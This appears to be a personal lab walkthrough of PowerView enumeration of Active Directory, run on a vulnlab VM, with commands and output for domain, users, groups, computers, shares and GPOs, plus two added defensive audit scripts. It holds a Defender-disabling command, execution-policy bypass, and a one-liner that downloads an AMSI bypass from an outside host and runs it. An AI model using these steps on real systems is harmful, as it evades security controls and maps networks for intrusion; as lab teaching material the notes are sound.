
PowerView Walkthrough

PowerView.ps1 can be found here

PowerView.ps1 can be downloaded here

Documentation

Official Documentation

For more functions, check out:

darkoperator/Veil-PowerView

Some Awesome Cheat Sheets

HarmJ0y’s

Hacktricks

HarmJ0y also has a good article on using some of PowerView’s interesting functionality.

Blog

Personal notes

In the demos below, I used the Delegate VM from vulnlab.

I logged in with WinRM as Administrator and disabled Windows Defender!

*Evil-WinRM* PS C:\windows\tasks> Set-MpPreference -DisableRealtimeMonitoring $true


I then downloaded PowerView onto one of my Windows 10 PCs for practice purposes.

First, fire up a command prompt and type:

powershell.exe -nop -exec bypass

You then need to import the PowerView module as follows:

Import-Module [full path to powerview.ps1]


Alternatively, you can run:

powershell -ep bypass

Followed by:

. .\PowerView.ps1


From here we can start enumerating 😉

We can get information about the domain as follows:

Get-NetDomain

*Evil-WinRM* PS C:\windows\tasks> Get-NetDomain

Forest                  : delegate.vl
DomainControllers       : {DC1.delegate.vl}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  :
PdcRoleOwner            : DC1.delegate.vl
RidRoleOwner            : DC1.delegate.vl
InfrastructureRoleOwner : DC1.delegate.vl
Name                    : delegate.vl


Getting information about DCs (you must be an Administrator to view this):

Again, first disable AMSI!

*Evil-WinRM* PS C:\windows\tasks> whoami
delegate\administrator
*Evil-WinRM* PS C:\windows\tasks> (new-object system.net.webclient).downloadstring("http://10.8.2.138:8000/AMSIBypassPatch.ps1")|iex
Protection Disabled
*Evil-WinRM* PS C:\windows\tasks> import-module .\PowerView.ps1
*Evil-WinRM* PS C:\windows\tasks> 

Some of the commands below give an error (no clue why…). In PowerView the function is Get-NetDomainController (singular), an alias of Get-DomainController; the plural name is not defined.

*Evil-WinRM* PS C:\windows\tasks> Get-NetDomainControllers
The term 'Get-NetDomainControllers' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.


To query domain policies:

Get-DomainPolicy

*Evil-WinRM* PS C:\windows\tasks> Get-DomainPolicy


Unicode        : @{Unicode=yes}
SystemAccess   : @{MinimumPasswordAge=1; MaximumPasswordAge=42; MinimumPasswordLength=7; PasswordComplexity=1; PasswordHistorySize=24; LockoutBadCount=0; RequireLogonToChangePassword=0; ForceLogoffWhenHourExpire=0; ClearTextPassword=0;
                 LSAAnonymousNameLookup=0}
KerberosPolicy : @{MaxTicketAge=10; MaxRenewAge=7; MaxServiceAge=600; MaxClockSkew=5; TicketValidateClient=1}
RegistryValues : @{MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=System.Object[]}
Version        : @{signature="$CHICAGO$"; Revision=1}
Path           : \\delegate.vl\sysvol\delegate.vl\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf
GPOName        : {31B2F340-016D-11D2-945F-00C04FB984F9}
GPODisplayName : Default Domain Policy


* The same policy from the ActiveDirectory PowerShell module:

*Evil-WinRM* PS C:\windows\tasks> Get-ADDefaultDomainPasswordPolicy


ComplexityEnabled           : True
DistinguishedName           : DC=delegate,DC=vl
LockoutDuration             : 00:30:00
LockoutObservationWindow    : 00:30:00
LockoutThreshold            : 0
MaxPasswordAge              : 42.00:00:00
MinPasswordAge              : 1.00:00:00
MinPasswordLength           : 7
objectClass                 : {domainDNS}
objectGuid                  : b74fec45-7fd8-4db4-b82c-86e2727310ea
PasswordHistoryCount        : 24
ReversibleEncryptionEnabled : False
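As an added example that is not part of the original notes, the following PowerShell checks the SystemAccess block that Get-DomainPolicy returned above against a simple baseline and lists the settings a defender should look at (LockoutBadCount is the same setting the AD module shows as LockoutThreshold). The function name Test-PasswordPolicyBaseline and the baseline numbers are my own assumptions; the sample hashtable is constructed from the values shown above.

```powershell
# Added example (not from the original walkthrough). Compares the SystemAccess
# section of Get-DomainPolicy with a baseline; the baseline numbers are assumptions.
# Works with the PSCustomObject PowerView returns or with a plain hashtable.
function Test-PasswordPolicyBaseline {
    param(
        [Parameter(Mandatory)] $SystemAccess,
        [int] $MinLength = 14,
        [int] $MinHistory = 24,
        [int] $MaxLockoutBadCount = 10
    )
    $findings = @()
    if ([int]$SystemAccess.MinimumPasswordLength -lt $MinLength) {
        $findings += "MinimumPasswordLength is $($SystemAccess.MinimumPasswordLength); baseline is $MinLength"
    }
    if ([int]$SystemAccess.PasswordComplexity -ne 1) {
        $findings += "PasswordComplexity is disabled"
    }
    if ([int]$SystemAccess.PasswordHistorySize -lt $MinHistory) {
        $findings += "PasswordHistorySize is $($SystemAccess.PasswordHistorySize); baseline is $MinHistory"
    }
    # LockoutBadCount=0 means accounts never lock out, so repeated failed logons are never throttled.
    if ([int]$SystemAccess.LockoutBadCount -eq 0) {
        $findings += "LockoutBadCount is 0: accounts never lock out"
    } elseif ([int]$SystemAccess.LockoutBadCount -gt $MaxLockoutBadCount) {
        $findings += "LockoutBadCount is $($SystemAccess.LockoutBadCount); baseline is at most $MaxLockoutBadCount"
    }
    # ClearTextPassword=1 stores passwords with reversible encryption.
    if ([int]$SystemAccess.ClearTextPassword -ne 0) {
        $findings += "ClearTextPassword is enabled (reversible encryption)"
    }
    if ([int]$SystemAccess.LSAAnonymousNameLookup -ne 0) {
        $findings += "LSAAnonymousNameLookup is enabled"
    }
    return $findings
}

# Constructed sample: the SystemAccess values from the Get-DomainPolicy output above.
$sample = @{
    MinimumPasswordAge = 1; MaximumPasswordAge = 42; MinimumPasswordLength = 7
    PasswordComplexity = 1; PasswordHistorySize = 24; LockoutBadCount = 0
    RequireLogonToChangePassword = 0; ForceLogoffWhenHourExpire = 0
    ClearTextPassword = 0; LSAAnonymousNameLookup = 0
}
Test-PasswordPolicyBaseline -SystemAccess $sample

# Against a live domain, pass the real object instead of the sample:
# Test-PasswordPolicyBaseline -SystemAccess (Get-DomainPolicy).SystemAccess
```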


If we want to enumerate users:

Get-NetUser

*Evil-WinRM* PS C:\windows\tasks> Get-NetUser


logoncount             : 575
badpasswordtime        : 9/26/2023 2:28:11 AM
description            : Built-in account for administering the computer/domain
distinguishedname      : CN=Administrator,CN=Users,DC=delegate,DC=vl
objectclass            : {top, person, organizationalPerson, user}
lastlogontimestamp     : 11/21/2024 11:31:42 PM
name                   : Administrator
objectsid              : S-1-5-21-1484473093-3449528695-2030935120-500
samaccountname         : Administrator
logonhours             : {255, 255, 255, 255...}
admincount             : 1
codepage               : 0
samaccounttype         : USER_OBJECT
accountexpires         : 12/31/1600 4:00:00 PM
countrycode            : 0
whenchanged            : 11/22/2024 7:31:42 AM
instancetype           : 4
objectguid             : b27dc933-9a1f-4f1f-8d0d-07b1efdd6ae7
lastlogon              : 10/12/2023 3:05:06 AM
lastlogoff             : 12/31/1600 4:00:00 PM
objectcategory         : CN=Person,CN=Schema,CN=Configuration,DC=delegate,DC=vl
dscorepropagationdata  : {8/26/2023 9:55:18 AM, 8/26/2023 9:55:18 AM, 8/26/2023 9:40:08 AM, 1/1/1601 6:12:16 PM}
memberof               : {CN=Group Policy Creator Owners,CN=Users,DC=delegate,DC=vl, CN=Domain Admins,CN=Users,DC=delegate,DC=vl, CN=Enterprise Admins,CN=Users,DC=delegate,DC=vl, CN=Schema Admins,CN=Users,DC=delegate,DC=vl...}
whencreated            : 8/26/2023 9:39:30 AM
iscriticalsystemobject : True
badpwdcount            : 0
cn                     : Administrator
useraccountcontrol     : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
usncreated             : 8196
primarygroupid         : 513
pwdlastset             : 8/26/2023 8:46:29 AM
usnchanged             : 127024



The above command dumps a lot of information for every user. In an organization with many users this quickly becomes a wall of output. We can narrow it down to just the names by running:

Get-NetUser | select cn

or

Get-NetUser | select samaccountname

*Evil-WinRM* PS C:\windows\tasks> Get-NetUser | select cn

cn
--
Administrator
Guest
krbtgt
A.Briggs
b.Brown
R.Cooper
J.Roberts
N.Thompson


If we want to get all the groups a user is a member of:

Get-DomainGroup -MemberIdentity username | select cn

or

Get-DomainGroup -MemberIdentity username | select samaccountname

*Evil-WinRM* PS C:\windows\tasks> Get-DomainGroup -MemberIdentity b.brown | select cn

cn
--
Domain Users


To check whether the current user context has local administrator access:

Invoke-CheckLocalAdminAccess

*Evil-WinRM* PS C:\windows\tasks> whoami
delegate\administrator
*Evil-WinRM* PS C:\windows\tasks> Invoke-CheckLocalAdminAccess

ComputerName IsAdmin
------------ -------
localhost       True


To check whether the current user has administrative access to the local (or a remote) machine. Test-AdminAccess is the current name of this function in PowerView; Invoke-CheckLocalAdminAccess is kept as an alias for it:

Test-AdminAccess

*Evil-WinRM* PS C:\windows\tasks> Test-AdminAccess

ComputerName IsAdmin
------------ -------
localhost       True


Lazy admins can leave juicy details behind in the description field. We can pull only the descriptions by running:

Get-NetUser | select description


*Evil-WinRM* PS C:\windows\tasks> Get-NetUser b.brown | select description

description
-----------


*Evil-WinRM* PS C:\windows\tasks> 


Checking another user's group membership the same way:

*Evil-WinRM* PS C:\windows\tasks> Get-DomainGroup -MemberIdentity j.roberts | select cn

cn
--
Domain Users
delegation admins


To get all the effective members of a group:

Get-DomainGroupMember -Identity "Domain Admins" -Recurse


*Evil-WinRM* PS C:\windows\tasks> Get-DomainGroupMember -Identity "Domain Admins" -Recurse

GroupDomain             : delegate.vl
GroupName               : Domain Admins
GroupDistinguishedName  : CN=Domain Admins,CN=Users,DC=delegate,DC=vl
MemberDomain            : delegate.vl
MemberName              : Administrator
MemberDistinguishedName : CN=Administrator,CN=Users,DC=delegate,DC=vl
MemberObjectClass       : user
MemberSID               : S-1-5-21-1484473093-3449528695-2030935120-500


Get information about all computers:

Get-NetComputer

*Evil-WinRM* PS C:\windows\tasks> Get-NetComputer


pwdlastset                    : 11/26/2024 10:55:07 PM
logoncount                    : 164
msds-generationid             : {46, 251, 32, 236...}
serverreferencebl             : CN=DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=delegate,DC=vl
badpasswordtime               : 12/31/1600 4:00:00 PM
msds-additionaldnshostname    : dc1.debugger.vl
distinguishedname             : CN=DC1,OU=Domain Controllers,DC=delegate,DC=vl
objectclass                   : {top, person, organizationalPerson, user...}
displayname                   : DC1$
lastlogontimestamp            : 11/26/2024 10:55:04 PM
name                          : DC1
primarygroupid                : 516
objectsid                     : S-1-5-21-1484473093-3449528695-2030935120-1000
samaccountname                : DC1$
localpolicyflags              : 0
codepage                      : 0
samaccounttype                : MACHINE_ACCOUNT
whenchanged                   : 11/27/2024 6:55:28 AM
accountexpires                : NEVER
cn                            : DC1
operatingsystem               : Windows Server 2022 Standard
instancetype                  : 4
msdfsr-computerreferencebl    : CN=DC1,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=delegate,DC=vl
objectguid                    : 3dc17337-6dde-4562-8fc7-50cdd3a94def
operatingsystemversion        : 10.0 (20348)
lastlogoff                    : 12/31/1600 4:00:00 PM
objectcategory                : CN=Computer,CN=Schema,CN=Configuration,DC=delegate,DC=vl
dscorepropagationdata         : {8/26/2023 9:40:08 AM, 1/1/1601 12:00:01 AM}
serviceprincipalname          : {Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC1.delegate.vl, TERMSRV/DC1, TERMSRV/DC1.delegate.vl, ldap/DC1.delegate.vl/DELEGATE...}
usncreated                    : 12293
lastlogon                     : 11/26/2024 10:55:34 PM
badpwdcount                   : 0
msds-additionalsamaccountname : DC1
useraccountcontrol            : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
whencreated                   : 8/26/2023 9:40:08 AM
countrycode                   : 0
iscriticalsystemobject        : True
msds-supportedencryptiontypes : 28
usnchanged                    : 127030
ridsetreferences              : CN=RID Set,CN=DC1,OU=Domain Controllers,DC=delegate,DC=vl
dnshostname                   : DC1.delegate.vl
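The msds-supportedencryptiontypes value above (28) is a bitmask. As an added example that is not part of the original notes, this PowerShell decodes it into Kerberos encryption type names and flags accounts that still accept RC4; the function name ConvertFrom-SupportedEncryptionTypes and the two extra sample hosts are assumptions, while the bit values are the documented ones for msDS-SupportedEncryptionTypes.

```powershell
# Added example (not from the original walkthrough). Decodes the numeric
# msDS-SupportedEncryptionTypes bitmask so a defender can see which accounts
# still negotiate RC4 (or DES) instead of AES only.
function ConvertFrom-SupportedEncryptionTypes {
    param([Parameter(Mandatory)] [int] $Value)
    # Bit values documented for msDS-SupportedEncryptionTypes (MS-KILE).
    $bits = [ordered]@{
        0x01 = 'DES_CBC_CRC'
        0x02 = 'DES_CBC_MD5'
        0x04 = 'RC4_HMAC'
        0x08 = 'AES128_CTS_HMAC_SHA1_96'
        0x10 = 'AES256_CTS_HMAC_SHA1_96'
        0x20 = 'AES256_CTS_HMAC_SHA1_96_SK'   # AES session-key flag (newer DCs)
    }
    # GetEnumerator() avoids the OrderedDictionary pitfall where $bits[4] means "4th entry".
    $names = @(foreach ($kv in $bits.GetEnumerator()) { if ($Value -band $kv.Key) { $kv.Value } })
    [pscustomobject]@{
        Value     = $Value
        Types     = $names
        AllowsRC4 = [bool]($Value -band 0x04)
        AllowsDES = [bool]($Value -band 0x03)
    }
}

# Constructed sample: DC1's value from the output above plus two assumed hosts.
$computers = @(
    [pscustomobject]@{ name = 'DC1';   'msds-supportedencryptiontypes' = 28 }     # 4 + 8 + 16 from the output above
    [pscustomobject]@{ name = 'WS01';  'msds-supportedencryptiontypes' = 24 }     # constructed: AES only
    [pscustomobject]@{ name = 'SRV01'; 'msds-supportedencryptiontypes' = $null }  # constructed: attribute unset
)
foreach ($c in $computers) {
    # An unset attribute has historically meant the KDC assumes RC4 for the account.
    $raw = $c.'msds-supportedencryptiontypes'
    $v = if ($null -eq $raw) { 0x04 } else { [int]$raw }
    $d = ConvertFrom-SupportedEncryptionTypes -Value $v
    '{0,-6} {1,3} RC4={2,-5} {3}' -f $c.name, $d.Value, $d.AllowsRC4, ($d.Types -join ', ')
}

# Live query with PowerView instead of the sample:
# Get-NetComputer | Select-Object name, msds-supportedencryptiontypes
```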


Enumerating which operating systems are in use on the domain:

Get-NetComputer | select operatingsystem

*Evil-WinRM* PS C:\windows\tasks> Get-NetComputer | select operatingsystem

operatingsystem
---------------
Windows Server 2022 Standard


Enumerating groups:

Get-NetGroup

This dumps a lot of information:

*Evil-WinRM* PS C:\windows\tasks> Get-NetGroup > output.txt

grouptype              : CREATED_BY_SYSTEM, DOMAIN_LOCAL_SCOPE, SECURITY
admincount             : 1
iscriticalsystemobject : True
samaccounttype         : ALIAS_OBJECT
samaccountname         : Administrators
whenchanged            : 8/26/2023 9:55:18 AM
objectsid              : S-1-5-32-544
objectclass            : {top, group}
cn                     : Administrators
usnchanged             : 12772
systemflags            : -1946157056
name                   : Administrators
dscorepropagationdata  : {8/26/2023 9:55:18 AM, 8/26/2023 9:40:08 AM, 1/1/1601 12:04:16 AM}
description            : Administrators have complete and unrestricted access to the computer/domain
distinguishedname      : CN=Administrators,CN=Builtin,DC=delegate,DC=vl
member                 : {CN=Domain Admins,CN=Users,DC=delegate,DC=vl, CN=Enterprise Admins,CN=Users,DC=delegate,DC=v
l, CN=Administrator,CN=Users,DC=delegate,DC=vl}
usncreated             : 8199
whencreated            : 8/26/2023 9:39:30 AM
instancetype           : 4
objectguid             : 35c4abd9-945a-4fec-818a-b9ffa0a88c09
objectcategory         : CN=Group,CN=Schema,CN=Configuration,DC=delegate,DC=vl

grouptype              : CREATED_BY_SYSTEM, DOMAIN_LOCAL_SCOPE, SECURITY
Description            : Users are prevented from making accidental or intentional system-wide changes and can run mo
member                 : {CN=Domain Users,CN=Users,DC=delegate,DC=vl, CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=del
etc.etc


We can summarise all of the above by running:

Get-NetGroup | select name

*Evil-WinRM* PS C:\windows\tasks> Get-NetGroup | select name

name
----
Administrators
Users
Guests
Print Operators
Backup Operators
Replicator
Remote Desktop Users
Network Configuration Operators
Performance Monitor Users
Performance Log Users
Distributed COM Users
IIS_IUSRS
Cryptographic Operators
Event Log Readers
Certificate Service DCOM Access
RDS Remote Access Servers
RDS Endpoint Servers
RDS Management Servers
Hyper-V Administrators
Access Control Assistance Operators
Remote Management Users
Storage Replica Administrators
Domain Computers
Domain Controllers
Schema Admins
Enterprise Admins
Cert Publishers
Domain Admins
Domain Users
Domain Guests
Group Policy Creator Owners
RAS and IAS Servers
Server Operators
Account Operators
Pre-Windows 2000 Compatible Access
Incoming Forest Trust Builders
Windows Authorization Access Group
Terminal Server License Servers
Allowed RODC Password Replication Group
Denied RODC Password Replication Group
Read-only Domain Controllers
Enterprise Read-only Domain Controllers
Cloneable Domain Controllers
Protected Users
Key Admins
Enterprise Key Admins
DnsAdmins
DnsUpdateProxy
delegation admins


To locate shares on hosts in the local domain:

Invoke-ShareFinder

*Evil-WinRM* PS C:\windows\tasks> Invoke-ShareFinder

Name           Type Remark              ComputerName
----           ---- ------              ------------
ADMIN$   2147483648 Remote Admin        DC1.delegate.vl
C$       2147483648 Default share       DC1.delegate.vl
IPC$     2147483651 Remote IPC          DC1.delegate.vl
NETLOGON          0 Logon server share  DC1.delegate.vl
SYSVOL            0 Logon server share  DC1.delegate.vl


To pull Group Policy Objects (GPOs):

Get-NetGPO

This dumps a lot of information:

*Evil-WinRM* PS C:\windows\tasks> Get-NetGPO


usncreated               : 5672
systemflags              : -1946157056
displayname              : Default Domain Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00
                           C04FB94F17}]
whenchanged              : 9/9/2023 2:10:32 PM
objectclass              : {top, container, groupPolicyContainer}
gpcfunctionalityversion  : 2
showinadvancedviewonly   : True
usnchanged               : 69785
dscorepropagationdata    : {8/26/2023 9:40:08 AM, 1/1/1601 12:00:00 AM}
name                     : {31B2F340-016D-11D2-945F-00C04FB984F9}
flags                    : 0
cn                       : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject   : True
gpcfilesyspath           : \\delegate.vl\sysvol\delegate.vl\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedname        : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=delegate,DC=vl
whencreated              : 8/26/2023 9:39:29 AM
versionnumber            : 9
instancetype             : 4
objectguid               : 3b9a44f2-0449-4fa2-87f6-d7255d9613f4
objectcategory           : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=delegate,DC=vl

usncreated               : 5675
systemflags              : -1946157056
displayname              : Default Domain Controllers Policy
gpcmachineextensionnames : [{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged              : 9/9/2023 2:10:32 PM
objectclass              : {top, container, groupPolicyContainer}
gpcfunctionalityversion  : 2
showinadvancedviewonly   : True
usnchanged               : 69787
dscorepropagationdata    : {8/26/2023 9:40:08 AM, 1/1/1601 12:00:00 AM}
name                     : {6AC1786C-016F-11D2-945F-00C04fB984F9}
flags                    : 0
cn                       : {6AC1786C-016F-11D2-945F-00C04fB984F9}
iscriticalsystemobject   : True
gpcfilesyspath           : \\delegate.vl\sysvol\delegate.vl\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
distinguishedname        : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=delegate,DC=vl
whencreated              : 8/26/2023 9:39:29 AM
versionnumber            : 8
instancetype             : 4
objectguid               : 108e9cde-591e-4f3f-a3b4-d51b9ac0dd55
objectcategory           : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=delegate,DC=vl


We can narrow it down by selecting specific attributes, for example:

Get-NetGPO | select displayname, whenchanged, whencreated

*Evil-WinRM* PS C:\windows\tasks> Get-NetGPO | select displayname, whenchanged, whencreated

displayname                       whenchanged         whencreated
-----------                       -----------         -----------
Default Domain Policy             9/9/2023 2:10:32 PM 8/26/2023 9:39:29 AM
Default Domain Controllers Policy 9/9/2023 2:10:32 PM 8/26/2023 9:39:29 AM


If you have any questions, don’t ask